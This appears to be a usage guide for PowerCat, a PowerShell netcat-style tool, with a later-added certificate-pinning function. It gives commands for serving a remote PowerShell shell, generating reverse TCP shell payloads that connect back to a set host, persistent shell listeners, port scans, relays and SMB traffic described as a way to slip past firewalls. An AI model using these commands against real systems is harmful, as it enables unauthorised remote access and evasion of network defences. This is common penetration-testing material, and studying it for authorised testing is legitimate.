PowerCat is a PowerShell TCP/IP Swiss Army knife that works with Netcat and Ncat. If you want to connect to SSH from PowerShell or set up a network environment, PowerCat is indispensable. Feel free to download it!
How to use PowerCat
PowerCat is actually a PowerShell function; the first time you use it, you need to run the script to load that function.
Because Windows by default does not allow any script to run, you need to enter Set-ExecutionPolicy RemoteSigned to allow local scripts to run.
PowerCat is packaged as a PowerShell module. You must import the module to use its functions.
# Import the functions via the psd1 file:
Import-Module PowerCat.psd1
By default, PowerCat uses TCP and reads from and writes to the console.
# Basic Listener:
Start-PowerCat -Port 443
# Basic Client:
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443
File transfer
PowerCat can be used to transfer files with the -SendFile and -ReceiveFile parameters.
# Send File:
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -SendFile C:\pathto\inputfile
# Receive File:
Start-PowerCat -Port 443 -ReceiveFile C:\pathto\outputfile
UDP and SMB
PowerCat supports more than just sending data over TCP.
# Send Data Over UDP:
Start-PowerCat -Mode Udp -Port 8000
# Send Data Over SMB (easily sneak past firewalls):
Start-PowerCat -Mode Smb -PipeName PowerCat
SSL
PowerCat dynamically generates an X509 certificate to provide SSL-encrypted TCP connections.
# Admin privileges are required to generate the self-signed certificate.
# Serve an SSL-Encrypted (Power)Shell:
Start-PowerCat -Mode Tcp -Port 80 -SslCn <Certificate Common Name> -Execute
# Connect to an SSL encrypted Ncat listener:
# Setup *nix with openssl & Ncat:
# openssl req -x509 -newkey rsa:2048 -subj /CN=PowerCat -days 90 -keyout key.pem -out cert.pem
# ncat -l -p 80 --ssl --ssl-cert cert.pem --ssl-key key.pem
Connect-PowerCat -Mode Tcp -RemoteIp 10.1.1.1 -Port 80 -SslCn PowerCat
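Because the listener's certificate is self-signed and generated on the fly, normal chain validation cannot vouch for it, and matching a common name with -SslCn does not tell you which certificate you actually reached. The following is an added example, not PowerCat's own code: it connects to a TLS listener, reports the certificate it presents, and optionally compares its thumbprint against one you expect. The host, port and thumbprint values are placeholders.

```powershell
# Added example (not part of PowerCat): inspect the certificate a TLS listener
# presents and, if a thumbprint is supplied, check that it matches (pinning).
function Get-RemoteCertificateInfo {
    param(
        [Parameter(Mandatory)][string]$RemoteHost,
        [Parameter(Mandatory)][int]$Port,
        [string]$ExpectedThumbprint   # optional pin: hex SHA-1 thumbprint of the expected cert
    )
    $client = [System.Net.Sockets.TcpClient]::new($RemoteHost, $Port)
    $ssl = $null
    try {
        # Accept whatever is presented inside the callback so the handshake completes;
        # the trust decision is made below against the pin, not by chain validation.
        $acceptAll = [System.Net.Security.RemoteCertificateValidationCallback]{
            param($sender, $certificate, $chain, $sslPolicyErrors) $true
        }
        $ssl = [System.Net.Security.SslStream]::new($client.GetStream(), $false, $acceptAll)
        # The name passed here plays the role that -SslCn plays for a PowerCat client.
        $ssl.AuthenticateAsClient($RemoteHost)
        $cert = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new($ssl.RemoteCertificate)
        # Thumbprints are upper-case hex; normalise the supplied pin before comparing.
        $pinMatches = $null
        if ($ExpectedThumbprint) {
            $pinMatches = ($cert.Thumbprint -eq ($ExpectedThumbprint -replace '[:\s]', '').ToUpper())
        }
        [pscustomobject]@{
            Subject    = $cert.Subject
            Issuer     = $cert.Issuer
            SelfSigned = ($cert.Subject -eq $cert.Issuer)
            NotAfter   = $cert.NotAfter
            Thumbprint = $cert.Thumbprint
            Protocol   = $ssl.SslProtocol
            PinMatches = $pinMatches   # $null when no pin was supplied
        }
    }
    finally {
        if ($ssl) { $ssl.Dispose() }
        $client.Dispose()
    }
}

# Usage with placeholder values; record the thumbprint on first contact and pin it afterwards:
# Get-RemoteCertificateInfo -RemoteHost 10.1.1.1 -Port 80 -ExpectedThumbprint '<EXPECTED_THUMBPRINT>'
```

Run it once without -ExpectedThumbprint to record the thumbprint of a listener you control, then pass that value on later connections so a different certificate with the same common name is reported as PinMatches = False.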
Relays
PowerCat relays are similar to netcat relays, but you do not need to create a file or start a process. You can also relay data between connections that use different protocols.
# UDP Listener to TCP Client Relay:
Start-PowerCat -Mode Udp -Port 8000 -Relay tcp:10.1.1.16:443
# TCP Listener to UDP Client Relay:
Start-PowerCat -Port 8000 -Relay udp:10.1.1.16:53
# TCP Client to Client Relay
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 9000 -Relay tcp:10.1.1.16:443
# TCP Listener to SMB Listener Relay
New-PowerCat -Listener -Port 8000 -Relay smb:PowerCat
Generating payloads
Payloads can be generated with the New-PowerCatPayload function.
# Generate a reverse tcp payload that connects back to 10.1.1.15 port 443:
New-PowerCatPayload -RemoteIp 10.1.1.15 -Port 443 -Execute
# Generate a tcp payload that listens on port 8000:
New-PowerCatPayload -Listener -Port 8000 -Execute
Miscellaneous usage
PowerCat can also perform port scans, start persistent listeners, or act as a simple web server.
# Basic TCP port scan:
1..1024 | ForEach-Object { Connect-PowerCat -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose -Disconnect }
# Basic UDP port scan:
1..1024 | ForEach-Object { Connect-PowerCat -Mode Udp -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose }
# Persistent listener:
Start-PowerCat -Port 443 -Execute -KeepAlive
# Simple Web Server:
Start-PowerCat -Port 80 -SendFile index.html
PowerCat basic functions and parameters
Start-PowerCat # Starts a listener/server.
-Mode # Defaults to Tcp, can also specify Udp or Smb.
-Port # The port to listen on.
-PipeName # Name of pipe to listen on.
-SslCn # Common name for Ssl encrypting Tcp.
-Relay # Format: "<Mode>:<Port/PipeName>"
-Execute # Execute a console process or powershell.
-SendFile # Filepath of file to send.
-ReceiveFile # Filepath of file to be written.
-Disconnect # Disconnect after connecting.
-KeepAlive # Restart after disconnecting.
-Timeout # Timeout option. Default: 60 seconds
Connect-PowerCat # Connects a client to a listener/server.
-Mode # Defaults to Tcp, can also specify Udp or Smb
-RemoteIp # IPv4 address of host to connect to.
-Port # The port to connect to.
-PipeName # Name of pipe to connect to.
-SslCn # Common name for Ssl encrypting Tcp.
-Relay # Format: "<Mode>:<IP>:<Port/PipeName>"
-Execute # Execute a console process or powershell.
-SendFile # Filepath of file to send.
-ReceiveFile # Filepath of file to be written.
-Disconnect # Disconnect after connecting.
-Timeout # Timeout option. Default: 60 seconds